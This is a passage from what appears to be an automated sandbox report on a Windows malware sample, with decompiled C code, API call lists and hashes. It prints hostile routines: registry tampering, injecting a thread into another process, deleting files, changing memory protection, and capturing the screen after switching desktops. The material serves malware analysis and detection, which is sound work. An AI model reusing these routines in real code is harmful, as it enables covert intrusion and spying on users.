					RegQueryValueExW(_v12,  *_t6, 0, 0, 0,  &_v8); // executed
					_v8 = _v8 + 0xa + _t84 * 2;
					_t85 = E0040F0A8(_v8 + 0xa + _t84 * 2);
					if(_t85 != 0) {
						_t59 =  *0x416c34; // 0x25df5a8
						_t15 = _t59 + 0x44; // 0x25df958
						RegQueryValueExW(_v12,  *_t15, 0, 0, _t85,  &_v8); // executed
						_t77 = _t85;
						_t82 = _t85;
						while(1) {
							_t61 =  *_t77 & 0x0000ffff;
							if(_t61 == 0 || _t61 == 0x2c) {
								goto L5;
							}
							L8:
							if( *_t77 == 0) {
								_t87 = E0040F533(_t85);
								if(_t87 > 0 && _t85[_t87 * 2 - 2] != 0x2c) {
									_t74 = 0x2c;
									 *(_t85 + _t87 * 2) = _t74;
									_t87 = _t87 + 1;
								}
								lstrcpyW(_t85 + _t87 * 2, _a4);
								_t88 = _t87 + _v16;
								lstrcpyW(_t85 + _t88 * 2, ",");
								_t33 = _t88 + 4; // 0x25df90c
								_t71 =  *0x416c34; // 0x25df5a8
								_t34 = _t71 + 0x44; // 0x25df958
								_t72 = RegSetValueExW(_v12,  *_t34, 0, 1, _t85, _t88 + _t33); // executed
								asm("sbb bl, bl");
								_t76 =  ~_t72 + 1;
							} else {
								_t77 =  &(_t77[2]);
								continue;
							}
							L15:
							E0040F0C0(_t85);
							goto L16;
							L5:
							if(_t77 - _t82 >> 1 != _v16 || StrCmpNIW(_t82, _a4, _v16) != 0) {
								_t20 =  &(_t77[2]); // 0x4
								_t82 = _t20;
								goto L8;
							} else {
								_t76 = 1;
							}
							goto L15;
						}
					}
					L16:
					RegCloseKey(_v12); // executed
					if(_t76 == 0) {
						_t84 = _v16;
						goto L18;
					}
				}
				return _t76;
			}






















    0x0040bc95
    0x0040bc9f
    0x0040bca5
    0x0040bcb0
    0x0040bcb3
    0x0040bcbb
    0x0040bcc3
    0x0040bdc8
    0x0040bdc8
    0x0040bdd0
    0x0040bdd7
    0x0040bdda
    0x0040bde7
    0x0040bcc9
    0x0040bccd
    0x0040bcd5
    0x0040bcd8
    0x0040bcde
    0x0040bceb
    0x0040bcf3
    0x0040bcf7
    0x0040bd01
    0x0040bd09
    0x0040bd0f
    0x0040bd15
    0x0040bd17
    0x0040bd19
    0x0040bd19
    0x0040bd1f
    0x00000000
    0x00000000
    0x0040bd46
    0x0040bd49
    0x0040bd5a
    0x0040bd5e
    0x0040bd6a
    0x0040bd6b
    0x0040bd6f
    0x0040bd6f
    0x0040bd77
    0x0040bd7d
    0x0040bd89
    0x0040bd8f
    0x0040bd94
    0x0040bd9e
    0x0040bda4
    0x0040bdae
    0x0040bdb0
    0x0040bd4b
    0x0040bd4c
    0x00000000
    0x0040bd4c
    0x0040bdb2
    0x0040bdb3
    0x00000000
    0x0040bd27
    0x0040bd30
    0x0040bd43
    0x0040bd43
    0x00000000
    0x0040bd4f
    0x0040bd4f
    0x0040bd4f
    0x00000000
    0x0040bd30
    0x0040bd19
    0x0040bdb8
    0x0040bdbb
    0x0040bdc3
    0x0040bdc5
    0x00000000
    0x0040bdc5
    0x0040bdc3
    0x0040bdef

    APIs
    • RegCreateKeyExW.KERNELBASE(80000002,025DFA18,00000000,00000000,00000000,00000003,00000000,?,00000000,?,?,00000000,025DF908), ref: 0040BCBB
    • RegQueryValueExW.KERNELBASE(?,025DF958,00000000,00000000,00000000,?,?,?,00000000,025DF908), ref: 0040BCDE
    • RegQueryValueExW.KERNELBASE(?,025DF958,00000000,00000000,00000000,?,?,?,00000000,025DF908), ref: 0040BD0F
    • StrCmpNIW.SHLWAPI(00000002,?,025DF908,?,?,00000000,025DF908), ref: 0040BD39
    • lstrcpyW.KERNEL32(00000000,?), ref: 0040BD77
    • lstrcpyW.KERNEL32(00000000,00403EAC), ref: 0040BD89
    • RegSetValueExW.KERNELBASE(?,025DF958,00000000,00000001,00000000,025DF90C,?,?,00000000,025DF908), ref: 0040BDA4
    • RegCloseKey.KERNELBASE(?,?,?,00000000,025DF908), ref: 0040BDBB
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Value$Querylstrcpy$CloseCreate
    • String ID:
    • API String ID: 4198832413-0
    • Opcode ID: c4d87d311685b49f4018c65c507b35c64de22a62e77cda0dec196119e552dbc7
    • Instruction ID: a5422d6f9c219361bdf7a6993a30ffce1b38900c95991cebce53dd78938a67d6
    • Opcode Fuzzy Hash: c4d87d311685b49f4018c65c507b35c64de22a62e77cda0dec196119e552dbc7
    • Instruction Fuzzy Hash: C3419936602108FBCB209BA9CD48EEEBFB9EF05344B018026F545A72A0E735D911CBD8
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040C0AE, Relevance: 7.6, APIs: 5, Instructions: 60COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0040C0AE(long _a4, union _SID_NAME_USE _a8) {
				void* _v8;
				short _v528;
				int _t26;
				int _t32;
				union _TOKEN_INFORMATION_CLASS _t33;
				void* _t35;

				_t33 = 0;
				if(OpenProcessToken(_a4, 8,  &_v8) != 0) {
					_a4 = 0;
					GetTokenInformation(_v8, 1, 0, 0,  &_a4); // executed
					_t35 = E0040F0A8(_a4);
					if(_t35 != 0) {
						_t26 = GetTokenInformation(_v8, 1, _t35, _a4,  &_a4); // executed
						if(_t26 != 0) {
							_a4 = 0x103;
							_t32 = LookupAccountSidW(0,  *_t35, _a8,  &_a4,  &_v528,  &_a4,  &_a8); // executed
							if(_t32 != 0) {
								_t33 = 1;
							}
						}
						E0040F0C0(_t35);
					}
					FindCloseChangeNotification(_v8); // executed
				}
				return _t33;
			}









    0x0040c0c1
    0x0040c0cb
    0x0040c0d9
    0x0040c0dc
    0x0040c0ea
    0x0040c0ee
    0x0040c0fd
    0x0040c105
    0x0040c11d
    0x0040c127
    0x0040c12f
    0x0040c131
    0x0040c131
    0x0040c12f
    0x0040c134
    0x0040c134
    0x0040c13c
    0x0040c142
    0x0040c147

    APIs
    • OpenProcessToken.ADVAPI32(?,00000008,00000000,00000000), ref: 0040C0C3
    • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,00000000), ref: 0040C0DC
    • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,?,?), ref: 0040C0FD
    • LookupAccountSidW.ADVAPI32(00000000,00000000,?,?,?,?,?), ref: 0040C127
    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040C13C
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Token$Information$AccountChangeCloseFindLookupNotificationOpenProcess
    • String ID:
    • API String ID: 3997156143-0
    • Opcode ID: 547ba595d7f5ae1344f96a63ebfdd81f1779ce76bb93c90b3e0184ac1e63cff6
    • Instruction ID: 2c770b5bcf42df034fa1a8b007eb2797cd411f31980d83029c068bbb394a3dd9
    • Opcode Fuzzy Hash: 547ba595d7f5ae1344f96a63ebfdd81f1779ce76bb93c90b3e0184ac1e63cff6
    • Instruction Fuzzy Hash: 19110A76500108FFDB119FA0DC85EDE7BBCEF08340F118136B955AA191EB75DB449BA4
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00407873, Relevance: 4.6, APIs: 3, Instructions: 52threadCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00407873(void* __eax, void* __ecx, intOrPtr _a4, long _a8) {
				char _v5;
				char _v6;
				void* _t11;
				intOrPtr _t12;
				void* _t23;

				_t23 = __eax;
				_v5 = 1;
				_v6 = 0;
				if(__eax != 0) {
					L4:
					_t11 = E004070D3(_t23); // executed
					if(_t11 != 0 && RtlCreateUserThread(_t23, 0, 0, 0, 0, 0, _t11 + _a4, 0, 0, 0) == 0) {
						_v6 = 1;
					}
					if(_v5 == 0) {
						FindCloseChangeNotification(_t23); // executed
					}
					_t12 = _v6;
				} else {
					_v5 = 0;
					if(_a8 == 0) {
						L3:
						_t12 = 0;
					} else {
						_t23 = OpenProcess(0x43a, 0, _a8);
						if(_t23 != 0) {
							goto L4;
						} else {
							goto L3;
						}
					}
				}
				return _t12;
			}








    0x0040787b
    0x0040787d
    0x00407881
    0x00407886
    0x004078a9
    0x004078aa
    0x004078b1
    0x004078cc
    0x004078cc
    0x004078d3
    0x004078d6
    0x004078d6
    0x004078dc
    0x00407888
    0x00407888
    0x0040788e
    0x004078a5
    0x004078a5
    0x00407890
    0x0040789f
    0x004078a3
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004078a3
    0x0040788e
    0x004078e2

    APIs
    • OpenProcess.KERNEL32(0000043A,00000000,025DF908,00406A53,00000000,?,?,00406607,-00010331,00000000,025DF5A8,?,?,025DF908), ref: 00407899
    • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004078C2
    • FindCloseChangeNotification.KERNELBASE(00000000,00000000,00406A53,00000000,?,?,00406607,-00010331,00000000,025DF5A8,?,?,025DF908), ref: 004078D6
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: ChangeCloseCreateFindNotificationOpenProcessThreadUser
    • String ID:
    • API String ID: 307445780-0
    • Opcode ID: c86bd27e8ad329dc283702f3ffc95cb9e5faea08e09f1f93ddcadd778adff7a7
    • Instruction ID: 614c3d17bb4526638088b8f68b84235134837efb421a8ce1df2c31fa13115014
    • Opcode Fuzzy Hash: c86bd27e8ad329dc283702f3ffc95cb9e5faea08e09f1f93ddcadd778adff7a7
    • Instruction Fuzzy Hash: 0D018472C08258BEEB116AA49C89AEF7B6C9F11348F05C0B9E941A2241D17D6D45C37A
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040FFBF, Relevance: 3.0, APIs: 2, Instructions: 8fileCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0040FFBF(WCHAR* _a4) {
				signed int _t6;

				SetFileAttributesW(_a4, 0x20); // executed
				_t6 = DeleteFileW(_a4); // executed
				return _t6 & 0xffffff00 | _t6 != 0x00000000;
			}




    0x0040ffc5
    0x0040ffcf
    0x0040ffda

    APIs
    • SetFileAttributesW.KERNELBASE(?,00000020,00412063,?,?,?,00000000), ref: 0040FFC5
    • DeleteFileW.KERNELBASE(00000000,?,?,00000000), ref: 0040FFCF
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$AttributesDelete
    • String ID:
    • API String ID: 2910425767-0
    • Opcode ID: 188b0b2285212e089f1c6df4997939e57e3c566c9ae95ea81ba26c042997fdfe
    • Instruction ID: 6102b86d210efc87d492dd320c079734b7a4812bf1cfcb85b982540be8ecba46
    • Opcode Fuzzy Hash: 188b0b2285212e089f1c6df4997939e57e3c566c9ae95ea81ba26c042997fdfe
    • Instruction Fuzzy Hash: C1C04835204302ABD7011B21EE0AB4EBAAABF94B41F06C438B245840B0CB72C861EB09
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00540004, Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON
    Download Yara Rule
    APIs
    • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000), ref: 005400A6
    Memory Dump Source
    • Source File: 00000000.00000002.464199377.0000000000540000.00000040.00000001.sdmp, Offset: 00540000, based on PE: false
    Similarity
    • API ID: ProtectVirtual
    • String ID:
    • API String ID: 544645111-0
    • Opcode ID: cbb4c135d4accfbbd946fa11c72b1a573c117da781d7f52a71e901d1aeb879dd
    • Instruction ID: 1b8c5f3e7670d232112edfc0dbb9e4e6c2932ecfb056d3f39dc75c26cb3557ba
    • Opcode Fuzzy Hash: cbb4c135d4accfbbd946fa11c72b1a573c117da781d7f52a71e901d1aeb879dd
    • Instruction Fuzzy Hash: A32136729051414BE7116B38CC483AABF95BFD9358F79A87DEA8997382C9388C41C751
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00540077, Relevance: 1.6, APIs: 1, Instructions: 67memoryCOMMON
    Download Yara Rule
    APIs
    • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000), ref: 005400A6
    Memory Dump Source
    • Source File: 00000000.00000002.464199377.0000000000540000.00000040.00000001.sdmp, Offset: 00540000, based on PE: false
    Similarity
    • API ID: ProtectVirtual
    • String ID:
    • API String ID: 544645111-0
    • Opcode ID: 961b601bbcab4acc5f1402820899e9ddaaca4764baa0798e72b16e56d5829718
    • Instruction ID: f4c75b828f0f4b5f0d57097adb348b87595a5ec3befc7ff1f2103dc949eeb7d1
    • Opcode Fuzzy Hash: 961b601bbcab4acc5f1402820899e9ddaaca4764baa0798e72b16e56d5829718
    • Instruction Fuzzy Hash: 641108725042019BD714BB34CC993AEBF95FFC4328F34B82DE68A97282C6359C81C722
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040B770, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
    Download Yara Rule
    APIs
    • SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000001,00406408,?,025DF908), ref: 0040B791
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: FolderPathSpecial
    • String ID:
    • API String ID: 994120019-0
    • Opcode ID: f84f60d26b8364099bcbd9f8da7c01a56791068e8f52c201820c4be0d64056b5
    • Instruction ID: c2c969ffa5e6bafc982bb85cbc9a2a83be5ca33ced2668a8fb6549a180254f0d
    • Opcode Fuzzy Hash: f84f60d26b8364099bcbd9f8da7c01a56791068e8f52c201820c4be0d64056b5
    • Instruction Fuzzy Hash: A7D0C9B16245105AFA0C4B24DD6ABB52264DB14761F16431CB657CA1E0EA9128409668
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040F0A8, Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0040F0A8(void* __eax) {
				void* _t3;

				if(__eax != 0) {
					_t3 = RtlAllocateHeap( *0x418074, 8, __eax + 4); // executed
					return _t3;
				} else {
					return __eax;
				}
			}




    0x0040f0aa
    0x0040f0b9
    0x0040f0bf
    0x0040f0ac
    0x0040f0ac
    0x0040f0ac

    APIs
    • RtlAllocateHeap.NTDLL(00000008,00000180,0040B604), ref: 0040F0B9
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: ca8ecb18dd3d27c67d3f44fffbc5821475682f9e305b00bf990f41ff915d08d2
    • Instruction ID: fbd33349e3d6ac0f6e14bff99680c45f7e22631591a176b0e46059d27092902f
    • Opcode Fuzzy Hash: ca8ecb18dd3d27c67d3f44fffbc5821475682f9e305b00bf990f41ff915d08d2
    • Instruction Fuzzy Hash: F1B092252404006AFE610721AD06B663A59B358309F828075B581E45A8DA28E8098A18
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    Function 0040970D, Relevance: 44.1, APIs: 24, Strings: 1, Instructions: 368libraryloaderwindowCOMMON
    Download Yara Rule
    C-Code - Quality: 44%
    			E0040970D(WCHAR* _a4, char _a8, signed int _a12) {
				void* _v12;
				WCHAR** _v16;
				void* _v20;
				void* _v24;
				_Unknown_base(*)()* _v28;
				struct HDC__* _v32;
				struct tagPOINT _v40;
				_Unknown_base(*)()* _v44;
				intOrPtr _v48;
				_Unknown_base(*)()* _v52;
				_Unknown_base(*)()* _v56;
				_Unknown_base(*)()* _v60;
				_Unknown_base(*)()* _v64;
				_Unknown_base(*)()* _v68;
				_Unknown_base(*)()* _v72;
				_Unknown_base(*)()* _v76;
				_Unknown_base(*)()* _v80;
				_Unknown_base(*)()* _v84;
				char _v88;
				_Unknown_base(*)()* _v92;
				intOrPtr _v96;
				char _v124;
				signed int _v128;
				struct HINSTANCE__* _v132;
				struct HINSTANCE__* _v136;
				struct HINSTANCE__* _v140;
				char _v144;
				struct _ICONINFO _v164;
				char _v180;
				intOrPtr _t159;
				intOrPtr _t161;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t167;
				intOrPtr _t169;
				intOrPtr _t171;
				intOrPtr _t173;
				_Unknown_base(*)()* _t174;
				intOrPtr _t176;
				intOrPtr _t178;
				_Unknown_base(*)()* _t179;
				intOrPtr _t180;
				intOrPtr _t182;
				intOrPtr _t184;
				intOrPtr _t186;
				intOrPtr _t188;
				intOrPtr _t190;
				intOrPtr _t192;
				intOrPtr _t194;
				intOrPtr _t196;
				_Unknown_base(*)()* _t197;
				intOrPtr _t202;
				struct HICON__* _t205;
				signed int _t209;
				intOrPtr _t211;
				void* _t216;
				void* _t239;
				intOrPtr* _t240;
				intOrPtr* _t258;
				intOrPtr _t259;
				signed int _t260;
				void* _t261;
				void* _t263;
				unsigned int _t270;
				struct HINSTANCE__* _t271;
				struct HINSTANCE__* _t272;
				struct HINSTANCE__* _t273;
				signed int _t274;
				signed int _t275;
				void* _t281;

				_t159 =  *0x416c34; // 0x25df5a8
				_t1 = _t159 + 0x80; // 0x25dfcc1
				_t271 = LoadLibraryA( *_t1);
				_t161 =  *0x416c34; // 0x25df5a8
				_t2 = _t161 + 0x90; // 0x25dfd29
				_v28 = GetProcAddress(_t271,  *_t2);
				_t163 =  *0x416c34; // 0x25df5a8
				_t4 = _t163 + 0x94; // 0x25dfd49
				_v72 = GetProcAddress(_t271,  *_t4);
				_t165 =  *0x416c34; // 0x25df5a8
				_t6 = _t165 + 0x98; // 0x25dfd69
				_v68 = GetProcAddress(_t271,  *_t6);
				_t167 =  *0x416c34; // 0x25df5a8
				_t8 = _t167 + 0x9c; // 0x25dfd99
				_v76 = GetProcAddress(_t271,  *_t8);
				_t169 =  *0x416c34; // 0x25df5a8
				_t10 = _t169 + 0xa0; // 0x25dfdb9
				_v80 = GetProcAddress(_t271,  *_t10);
				_t171 =  *0x416c34; // 0x25df5a8
				_t12 = _t171 + 0xa4; // 0x25dfde1
				_v60 = GetProcAddress(_t271,  *_t12);
				_t173 =  *0x416c34; // 0x25df5a8
				_t14 = _t173 + 0xa8; // 0x25dfe09
				_t174 = GetProcAddress(_t271,  *_t14);
				_v92 = _t174;
				if(_t271 == 0 || _v28 == 0 || _v72 == 0 || _v68 == 0 || _v76 == 0 || _v80 == 0 || _v60 == 0 || _t174 == 0) {
					L52:
					return 0;
				} else {
					_t176 =  *0x416c34; // 0x25df5a8
					_t22 = _t176 + 0x84; // 0x25dfce1
					_t272 = LoadLibraryA( *_t22);
					_t178 =  *0x416c34; // 0x25df5a8
					_t23 = _t178 + 0xac; // 0x25dfe31
					_t179 = GetProcAddress(_t272,  *_t23);
					_v84 = _t179;
					if(_t272 == 0 || _t179 == 0) {
						goto L52;
					} else {
						_t180 =  *0x416c34; // 0x25df5a8
						_t25 = _t180 + 0x88; // 0x25dfcf9
						_t273 = LoadLibraryA( *_t25);
						_t182 =  *0x416c34; // 0x25df5a8
						_t26 = _t182 + 0xb0; // 0x25dfe59
						_t258 = GetProcAddress(_t273,  *_t26);
						_t184 =  *0x416c34; // 0x25df5a8
						_t27 = _t184 + 0xb4; // 0x25dfe71
						_v16 = GetProcAddress(_t273,  *_t27);
						_t186 =  *0x416c34; // 0x25df5a8
						_t29 = _t186 + 0xb8; // 0x25dfe91
						_v12 = GetProcAddress(_t273,  *_t29);
						_t188 =  *0x416c34; // 0x25df5a8
						_t31 = _t188 + 0xbc; // 0x25dfeb1
						_v20 = GetProcAddress(_t273,  *_t31);
						_t190 =  *0x416c34; // 0x25df5a8
						_t33 = _t190 + 0xc0; // 0x25dfed9
						_v44 = GetProcAddress(_t273,  *_t33);
						_t192 =  *0x416c34; // 0x25df5a8
						_t35 = _t192 + 0xc4; // 0x25dfef9
						_v52 = GetProcAddress(_t273,  *_t35);
						_t194 =  *0x416c34; // 0x25df5a8
						_t37 = _t194 + 0xc8; // 0x2563619
						_v56 = GetProcAddress(_t273,  *_t37);
						_t196 =  *0x416c34; // 0x25df5a8
						_t39 = _t196 + 0xcc; // 0x25dff11
						_t197 = GetProcAddress(_t273,  *_t39);
						_v64 = _t197;
						if(_t273 == 0 || _t258 == 0 || _v16 == 0 || _v12 == 0 || _v20 == 0 || _v44 == 0 || _v52 == 0 || _v56 == 0 || _t197 == 0) {
							goto L52;
						} else {
							_v24 = 0;
							_v144 = 1;
							_v140 = 0;
							_v136 = 0;
							_v132 = 0;
							if(_a12 != 0 || E0040BFE7() != 0) {
								_push(0);
								_push( &_v144);
								_push( &_v88);
								if(_v28() != 0) {
									goto L51;
								}
								_t202 =  *0x416c34; // 0x25df5a8
								_t56 = _t202 + 0x8c; // 0x25dfd11
								_t259 =  *_t258( *_t56, 0, 0, 0);
								_v28 = _t259;
								_v32 = _v16(_t259);
								_v40.y = 0;
								_v40.x = 0;
								_t205 = LoadCursorW(0, 0x7f00);
								_v16 = _t205;
								GetIconInfo(_t205,  &_v164);
								GetCursorPos( &_v40);
								if(_a12 == 0) {
									_t209 = _v12(_t259, 8);
									_t274 = _t209;
									_t260 = _v12(_t259, 0xa);
								} else {
									_t274 = _a12 & 0x0000ffff;
									_t260 = _t274;
								}
								_t211 = _v20(_v28, _t274, _t260);
								_v48 = _t211;
								if(_t211 == 0) {
									L50:
									_v64(_v32);
									_v64(_v28);
									_v72(_v88);
									goto L51;
								} else {
									_v96 = _v44(_v32, _t211);
									_t216 = 0;
									_t263 = 0;
									if(_a12 != 0) {
										_t270 = (_a12 & 0x0000ffff) >> 1;
										_t216 = _v40.x - _t270;
										_v40.x = _v40.x - _t216;
										_t263 = _v40.y - _t270;
										_v40.y = _v40.y - _t263;
									}
									_v52(_v32, 0, 0, _t274, _t260, _v28, _t216, _t263, 0x40cc0020);
									DrawIcon(_v32, _v40.x - _v164.xHotspot, _v40.y - _v164.yHotspot, _v16);
									_push( &_v12);
									_push(0);
									_push(_v48);
									_v12 = 0;
									if(_v68() != 0 || _v12 == 0) {
										L49:
										_v44(_v32, _v96);
										_v56(_v48);
										goto L50;
									} else {
										_push( &_v20);
										_push( &_a12);
										_a12 = 0;
										_v20 = 0;
										if(_v80() != 0) {
											L48:
											_v76(_v12);
											goto L49;
										}
										_t231 = _v20;
										if(_v20 == 0 || _a12 == 0) {
											goto L48;
										} else {
											_t261 = E0040F0A8(_t231);
											if(_t261 == 0) {
												goto L48;
											}
											_v60(_a12, _v20, _t261);
											_t275 = 0;
											if(_a12 <= 0) {
												L40:
												E0040F0C0(_t261);
												if(_v20 == 0) {
													_push( &_v24);
													_push(1);
													_push(0);
													if(_v84() == 0 && _v24 != 0) {
														_v128 = 0;
														if(_a8 > 0) {
															E0040F0FC( &_v124, 0x401d98, 0x10);
															 *((intOrPtr*)(_t281 + _v128 * 0x1c - 0x64)) = 4;
															 *((intOrPtr*)(_t281 + _v128 * 0x1c - 0x68)) = 1;
															 *((intOrPtr*)(_t281 + _v128 * 0x1c - 0x60)) =  &_a8;
															_v128 = _v128 + 1;
														}
														_t239 = _v92(_v12, _v24,  &_v180,  &_v128);
														_t240 = _v24;
														if(_t239 == 0) {
															 *((intOrPtr*)( *_t240 + 0x14))(_t240, 0, 0, 0, 0);
														} else {
															 *((intOrPtr*)( *_t240 + 8))(_t240);
															_v24 = 0;
														}
													}
												}
												goto L48;
											}
											_t108 = _t261 + 0x30; // 0x30
											_v16 = _t108;
											while(lstrcmpiW(_a4,  *_v16) != 0) {
												_v16 = _v16 + 0x4c;
												_t275 = _t275 + 1;
												if(_t275 < _a12) {
													continue;
												}
												goto L40;
											}
											E0040F0FC( &_v180, _t275 * 0x4c + _t261, 0x10);
											_v20 = 0;
											goto L40;
										}
									}
								}
							} else {
								L51:
								return _v24;
							}
						}
					}
				}
			}









































































    0x00409716
    0x0040971e
    0x0040972a
    0x0040972c
    0x00409731
    0x0040973e
    0x00409741
    0x00409746
    0x00409753
    0x00409756
    0x0040975b
    0x00409768
    0x0040976b
    0x00409770
    0x0040977d
    0x00409780
    0x00409785
    0x00409792
    0x00409795
    0x0040979a
    0x004097a7
    0x004097aa
    0x004097af
    0x004097b6
    0x004097be
    0x004097c3
    0x00409bce
    0x00000000
    0x00409807
    0x00409807
    0x0040980c
    0x00409818
    0x0040981a
    0x0040981f
    0x00409826
    0x0040982c
    0x00409831
    0x00000000
    0x0040983f
    0x0040983f
    0x00409844
    0x00409850
    0x00409852
    0x00409857
    0x00409864
    0x00409866
    0x0040986b
    0x00409878
    0x0040987b
    0x00409880
    0x0040988d
    0x00409890
    0x00409895
    0x004098a2
    0x004098a5
    0x004098aa
    0x004098b7
    0x004098ba
    0x004098bf
    0x004098cc
    0x004098cf
    0x004098d4
    0x004098e1
    0x004098e4
    0x004098e9
    0x004098f0
    0x004098f6
    0x004098fb
    0x00000000
    0x00409947
    0x00409947
    0x0040994a
    0x00409954
    0x0040995a
    0x00409960
    0x00409967
    0x00409976
    0x0040997d
    0x00409981
    0x00409987
    0x00000000
    0x00000000
    0x0040998d
    0x00409995
    0x0040999d
    0x004099a0
    0x004099ac
    0x004099af
    0x004099b2
    0x004099b5
    0x004099c3
    0x004099c6
    0x004099d0
    0x004099da
    0x004099e7
    0x004099ed
    0x004099f2
    0x004099dc
    0x004099dc
    0x004099e0
    0x004099e0
    0x004099f9
    0x004099fc
    0x00409a01
    0x00409bb7
    0x00409bba
    0x00409bc0
    0x00409bc6
    0x00000000
    0x00409a07
    0x00409a0e
    0x00409a11
    0x00409a13
    0x00409a19
    0x00409a25
    0x00409a27
    0x00409a29
    0x00409a2c
    0x00409a2e
    0x00409a2e
    0x00409a42
    0x00409a5f
    0x00409a68
    0x00409a69
    0x00409a6a
    0x00409a6d
    0x00409a75
    0x00409ba8
    0x00409bae
    0x00409bb4
    0x00000000
    0x00409a84
    0x00409a87
    0x00409a8b
    0x00409a8c
    0x00409a8f
    0x00409a97
    0x00409ba2
    0x00409ba5
    0x00000000
    0x00409ba5
    0x00409a9d
    0x00409aa2
    0x00000000
    0x00409ab1
    0x00409ab6
    0x00409aba
    0x00000000
    0x00000000
    0x00409ac7
    0x00409aca
    0x00409acf
    0x00409b0c
    0x00409b0d
    0x00409b15
    0x00409b1e
    0x00409b22
    0x00409b23
    0x00409b29
    0x00409b30
    0x00409b36
    0x00409b43
    0x00409b4e
    0x00409b5c
    0x00409b69
    0x00409b6d
    0x00409b6d
    0x00409b81
    0x00409b86
    0x00409b89
    0x00409b9f
    0x00409b8b
    0x00409b8e
    0x00409b91
    0x00409b91
    0x00409b89
    0x00409b29
    0x00000000
    0x00409b15
    0x00409ad1
    0x00409ad4
    0x00409ad7
    0x00409ae9
    0x00409aed
    0x00409af1
    0x00000000
    0x00000000
    0x00000000
    0x00409af3
    0x00409b04
    0x00409b09
    0x00000000
    0x00409b09
    0x00409aa2
    0x00409a75
    0x00409bc9
    0x00409bc9
    0x00000000
    0x00409bc9
    0x00409967
    0x004098fb
    0x00409831

    APIs
    • LoadLibraryA.KERNELBASE(025DFCC1), ref: 00409724
    • GetProcAddress.KERNELBASE(00000000,025DFD29), ref: 00409738
    • GetProcAddress.KERNELBASE(00000000,025DFD49), ref: 0040974D
    • GetProcAddress.KERNELBASE(00000000,025DFD69), ref: 00409762
    • GetProcAddress.KERNELBASE(00000000,025DFD99), ref: 00409777
    • GetProcAddress.KERNELBASE(00000000,025DFDB9), ref: 0040978C
    • GetProcAddress.KERNELBASE(00000000,025DFDE1), ref: 004097A1
    • GetProcAddress.KERNELBASE(00000000,025DFE09), ref: 004097B6
    • LoadLibraryA.KERNELBASE(025DFCE1), ref: 00409812
    • GetProcAddress.KERNELBASE(00000000,025DFE31), ref: 00409826
    • LoadLibraryA.KERNELBASE(025DFCF9), ref: 0040984A
    • GetProcAddress.KERNELBASE(00000000,025DFE59), ref: 0040985E
    • GetProcAddress.KERNELBASE(00000000,025DFE71), ref: 00409872
    • GetProcAddress.KERNELBASE(00000000,025DFE91), ref: 00409887
    • GetProcAddress.KERNELBASE(00000000,025DFEB1), ref: 0040989C
    • GetProcAddress.KERNELBASE(00000000,025DFED9), ref: 004098B1
    • GetProcAddress.KERNELBASE(00000000,025DFEF9), ref: 004098C6
    • GetProcAddress.KERNELBASE(00000000,02563619), ref: 004098DB
    • GetProcAddress.KERNELBASE(00000000,025DFF11), ref: 004098F0
    • LoadCursorW.USER32(00000000,00007F00), ref: 004099B5
    • GetIconInfo.USER32(00000000,?), ref: 004099C6
    • GetCursorPos.USER32(?), ref: 004099D0
    • DrawIcon.USER32(00406101,?,?,?), ref: 00409A5F
      • Part of subcall function 0040BFE7: OpenWindowStationA.USER32(025DFAF9,00000000,10000000), ref: 0040BFFB
      • Part of subcall function 0040BFE7: SetProcessWindowStation.USER32(00000000), ref: 0040C008
      • Part of subcall function 0040BFE7: OpenDesktopA.USER32(025DFC59,00000000,00000000,10000000), ref: 0040C01D
      • Part of subcall function 0040BFE7: SetThreadDesktop.USER32(00000000), ref: 0040C02A
      • Part of subcall function 0040BFE7: CloseDesktop.USER32(00000000), ref: 0040C033
      • Part of subcall function 0040BFE7: CloseWindowStation.USER32(00000000), ref: 0040C03A
    • lstrcmpiW.KERNEL32(?,?,?,?,00000000), ref: 00409ADF
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: AddressProc$Load$DesktopLibraryStationWindow$CloseCursorIconOpen$DrawInfoProcessThreadlstrcmpi
    • String ID: L
    • API String ID: 901220281-2909332022
